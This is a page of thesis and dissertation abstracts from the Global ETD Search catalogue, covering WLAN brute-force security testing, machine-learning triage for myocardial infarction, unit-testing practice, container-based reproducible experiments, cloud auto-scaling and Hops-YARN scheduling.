• Refine Query
  • Source
  • Publication year
  • to
  • Language
  • 1531
  • 192
  • 128
  • 104
  • 19
  • 18
  • 9
  • 7
  • 6
  • 6
  • 6
  • 6
  • 6
  • 6
  • 3
  • Tagged with
  • 2199
  • 2199
  • 850
  • 456
  • 442
  • 283
  • 277
  • 249
  • 242
  • 221
  • 214
  • 202
  • 201
  • 199
  • 183
  • About
  • The Global ETD Search service is a free service for researchers to find electronic theses and dissertations. This service is provided by the Networked Digital Library of Theses and Dissertations.
    Our metadata is collected from universities around the world. If you manage a university/consortium/country archive and want to be added, details can be found on the NDLTD website.
801

Penetrationstest av WLAN : med brute force av WEP, WPA, WPA2 och WPS

Eklund Berggren, Oscar January 2020 (has links)
I en tid då datorer, mobiler och andra enheter som kan ansluta till ett WLAN är stor, kommer säkerheten i dessa WLAN spela en stor roll. Det som skiljer WLAN och LAN när det kommer till säkerheten är att informationen måste färdas trådlöst i luften, vilket kan medföra att obehöriga kan lyssna av eller försöka koppla upp sig mot det trådlösa nätverket. Valet och implementationen av kryptering av WLAN för SME och privatpersoner har en stor inverkan på säkerheten i ens WLAN. Hur enkelt är det för en obehörig person att ta sig in på ett WLAN? Denna undersökning testar WLAN som använder WEP, WPA/WPA2 PSK och WPS med hjälp av en brute force attack för att avgöra om krypteringprotokollen är lämpliga att använda sig av. Testet simuleras med en obehörig laptop som försöker ta sig in in WLAN med brute force på WLAN som använder WEP, WPA/WPA2 PSK och WPS. Program som aircrack-ng och airgeddon används för att utföra testerna.
802

Fine grain mapping strategies for pipelined computer systems

Shieh, Jong-Jiann January 1990 (has links)
No description available.
803

Predicting Myocardial Infarction using Textual Prehospital Data and Machine Learning

Van der Haas, Yvette Jane January 2021 (has links)
A major healthcare problem is the overcrowding of hospitals and emergency departments which leads to negative patient outcomes and increased costs. In a previous study, performed by Leiden University Medical Centre, a new and innovative prehospital triage method was developed where two nurse paramedics could consult a cardiologist for patients with cardiac symptoms, via a live connection on a digital triage platform. The developed triage method resulted in a recall = 0.995 and specificity = 0.0113. This study arise the following research question: ‘Would there be enough (good) information gathered on the prehospital scene to make a machine learning model able to predict myocardial infarction?’. By testing different pre-processing steps, several features (premade ones and self-made ones), multiple models (Support Vector Machine, K Nearest Neighbour, Logistic Regression and Random Forest), various outcome settings and hyperparameters, led to the final results: recall = 0.995 and specificity = 0.1101. This is gained through the feature selected by a cardiologist and the Support Vector Machine model. The outcomes are controlled by an extra explainability layer named Explain Like I’m Five. This outcome illustrates that the created machine learning model is trained mostly on the right words and characters.
804

Access compatibility for shared logical resources /

Rypka, David Jerome January 1982 (has links)
No description available.
805

The use of mental models to affect quality in human-computer interactions /

Coovert, Michael David January 1985 (has links)
No description available.
806

An associatively controlled functional multiprocessor for real-time applications /

Ebner, George Chester January 1972 (has links)
No description available.
807

Utvecklares upplevelser av enhetstester

Lindberg, Robert, Thysell, Oskar January 2022 (has links)
Syftet med studien har varit att undersöka vilka utmaningar utvecklare upplever vidgenomförande av enhetstester. Enhetstester är testkod som skrivs för att verifiera att produktionskod eller så kallad vanlig kod fungerar på ett bra sätt och uppfyller sitt syfte. Detta är den typ av testning vilket görs först i en utvecklingsprocess för att garantera att koden håller god kvalitét. Studien genomfördes genom att 5 utvecklare på ett IT konsultföretag i Luleå medverkat i individuella öppna kvalitativa intervjuer där de fått svara på frågor kring deras upplevelser av att arbeta med enhetstest. De slutsatser som studien har kommit fram till är att många av de identifierade problem som framkommit i denna studie stämmer överens med tidigare forskning inom detta ämne. Huvudsakligen var dessa problem av teknisk natur, där exempelvis underhåll, att veta vad som ska testas och att veta när en har testat tillräckligt, hörde till de vanligast förekommande gemensamma. Detta visar att denna problematik finns kvar än i dag. Vad som även framkommit i denna studie är att det är vanligt med avsaknad avutbildning gällande enhetstest. Även avsaknad av någon gemensam metod är något vi, speciellt i kombination med avsaknad av utbildning, anser förvärrar problematiken som redan existerar. Med hjälp av studiens kvalitativa ansats så har det identifierats en del potentiellabidragande faktorer för dessa upplevda problem. Utifrån dessa slutsatser har det formulerats rekommendationer för organisationer och för vidare forskning. / The purpose of the study has been to investigate what challenges developers experience when working with unit tests. Unit tests are test code written to verify that production code or so-called regular code works well and fulfills its purpose. This is the type of testing which is done first in a development process to guarantee that the code maintains good quality. The study was carried out by having 5 developers at an IT consulting company in Luleå participate in individual open qualitative interviews where they had to answer questions about their experiences of working with unit tests. The conclusions that the study has reached are that many of the identified problems that emerged in this study are consistent with previous research on this topic. Mainly these problems were of a technical nature, where, for example, maintenance, knowing what to test and knowing when one has tested enough, were among the most commonly occurring ones. This shows that these problems still exist today. What also emerged in this study is that it is common to lack education regarding unit tests. Also the lack of a common method is something we, especially in combination with the lack of education, consider to worsen the problems that already exist. With the help of the study's qualitative approach, some potential contributing factors for these perceived problems have also been identified. Based on these conclusions, recommendations have been formulated for organizations and for further research.
808

Efficient and Cost-effective Workflow Based on Containers for Distributed Reproducible Experiments

Perera, Shelan January 2016 (has links)
Reproducing distributed experiments is a challenging task for many researchers. There are many factors which make this problem harder to solve. In order to reproduce distributed experiments, researchers need to perform complex deployments which involve many dependent software stacks with many configurations and manual orchestrations. Further, researchers need to allocate a larger amount of money for clusters of machines and then spend their valuable time to perform those experiments. Also, some of the researchers spend a lot of time to validate a distributed scenario in a real environment as most of the pseudo distributed systems do not provide the characteristics of a real distributed system. Karamel provides solutions for the inconvenience caused by the manual orchestration by providing a comprehensive orchestration platform to deploy and run distributed experiments. But still, this solution may incur a similar amount of expenses as of a manual distributed setup since it uses virtual machines underneath. Further, it does not provide quick validations of a distributed setup with a quick feedback loop, as it takes considerable time to terminate and provision new virtual machines. Therefore, we provide a solution by integrating Docker that can co-exists with virtual machine based deployment model seamlessly. Our solution encapsulates the container-based deployment model for users to reproduce distributed experiment in a cost-effective and efficient manner. In this project, we introduce novel deployment model with containers that is not possible with the conventional virtual machine based deployment model. Further, we evaluate our solution with a real deployment of Apache Hadoop Terasort experiment which is a benchmark for Apache Hadoop map-reduce platform in order to explain how this model can be used to save the cost and improve the efficiency.
809

Window-based Cost-effective Auto-scaling Solution with Optimized Scale-in Strategy

Perera, Ashansa January 2016 (has links)
Auto-scaling is a major way of minimizing the gap between the demand and the availability of the computing resources for the applications with dynamic workloads. Even though a lot of effort has been taken to address the requirement of auto-scaling for the distributed systems, most of the available solutions are application-specific and consider only on fulfilling the application level requirements. Today, with the pay-as-you-go model of cloud computing, many different price plans have been offered by the cloud providers which leads the resource price to become an important decision-making criterion at the time of auto-scaling. One major step is using the spot instances which are more advantageous in the aspect of cost for elasticity. However, using the spot instances for auto-scaling should be handled carefully to avoid its drawbacks since the spot instances can be terminated at any time by the infrastructure providers. Despite the fact that some cloud providers such as Amazon Web Services and Google Compute Engine have their own auto-scaling solutions, they do not follow the goal of cost-effectiveness. In this work, we introduce our auto-scaling solution that is targeted for middle-layers in-between the cloud and the application, such as Karamel. Our work combines the aspect of minimizing the cost of the deployment with maintaining the demand for the resources. Our solution is a rule-based system that is built on top of resource utilization metrics as a more general metric for workloads. Further, the machine terminations and the billing period of the instances are taken into account as the cloud source events. Different strategies such as window based profiling, dynamic event profiling, and optimized scale-in strategy have been used to achieve our main goal of providing a cost-effective auto-scaling solution for cloud-based deployments. With the help of our simulation methodology, we explore our parameter space to find the best values under different workloads. Moreover, our cloud-based experiments show that our solution performs much more economically compare to the available cloud-based auto-scaling solutions.
810

High performance shared state schedulers

Kouzoupis, Antonios January 2016 (has links)
Large organizations and research institutes store a huge volume of data nowadays.In order to gain any valuable insights distributed processing frameworks over acluster of computers are needed. Apache Hadoop is the prominent framework fordistributed storage and data processing. At SICS Swedish ICT we are building Hops, a new distribution of Apache Hadoop relying on a distributed, highly available MySQL Cluster NDB to improve performance. Hops-YARN is the resource management framework of Hops which introduces distributed resource management, load balancing the tracking of resources in a cluster. In Hops-YARN we make heavy usage of the back-end database storing all the resource manager metadata and incoming RPCs to provide high fault tolerance and very short recovery time. This project aims in optimizing the mechanisms used for persisting metadata in NDB both in terms of transactional commit time but also in terms of pre-processing them. Under no condition should the in-memory RM state diverge from the state stored in NDB. With these goals in mind several solutions were examined that improved the performance of the system, making Hops-YARN comparable to Apache YARN with the extra benefits of high-fault tolerance and short recovery time. The solutions proposed in this thesis project enhance the pure commit time of a transaction to the MySQL Cluster and the pre-processing and parallelism of our Transaction Manager. The results indicate that the performance of Hops increased dramatically, utilizing more resources on a cluster with thousands of machines. Increasing the cluster utilization by a few percentages can save organizations a big amount of money. / Nu för tiden lagrar stora organisationer och forskningsinstitutioner enorma mängder data.För att kunna utvinna någon värdefull information från dessa data behöver den bearbetasav ett kluster av datorer. När flera datorer gemensamt ska bearbeta data behöver de utgåfrån ett så kallat "distributed processing framework''. I dagsläget är Apache Hadoop detmest använda ramverket för distribuerad lagring och behandling av data. Detta examensarbeteär har genomförts vid SICS Swedish ICT där vi byggt Hops, en ny distribution avApache Hadoop som drivs av ett distribuerat MySQL Cluster NDB som erbjuder en hög tillgänglighet.Hops-YARN är Hops ramverk för resurshantering med distribuerade ResourceManagers som lastbalanserarderas ResourceTrackerService. I detta examensarbete använder vi Hops-Yarn på ett sätt där ``back-end''databasen flitigt används för att hantera ResourceManagerns metadata och inkommande RPC-anrop. Vårkonfiguration erbjuder en hög feltolerans och återställer sig mycket snabbt vidfelberäkningar. Vidare används NDB-klustrets Event API för att ResourceManager ska kunnakommunicera med den distribuerade ResourceTrackers. Detta projekt syftar till att optimera de mekanismer som används för ihållande metadatai NDB både i termer av transaktions begå tid men också i termer av pre-bearbeta dem medan samtidigt garantera enhetlighet i RM: s tillstånd. ResourceManagerns tillståndi RAM-minnet får under inga omständigheteravvika från det tillstånd som finns lagrat i NDB:n. Med dessa mål i åtanke undersöktes fleralösningar som förbättrar prestandan och därmed gör Hops-Yarn jämförbart med Apache YARN.De lösningar som föreslås i denna uppsats förbättrar “pure commit time” när en transaktiongörs i ett MySQL Cluster samt förbehandlingen och parallelismen i vår Transaction Manager.Resultaten tyder på att Hops prestanda ökade dramatiskt vilket ledde till ett effektivarenyttjande av tillgängliga resurser i ett kluster bestående av ett tusental datorer. Närnyttjandet av tillgänliga resurser i ett kluster förbättras med några få procent kanorganisationer spara mycket pengar.

Page generated in 0.0386 seconds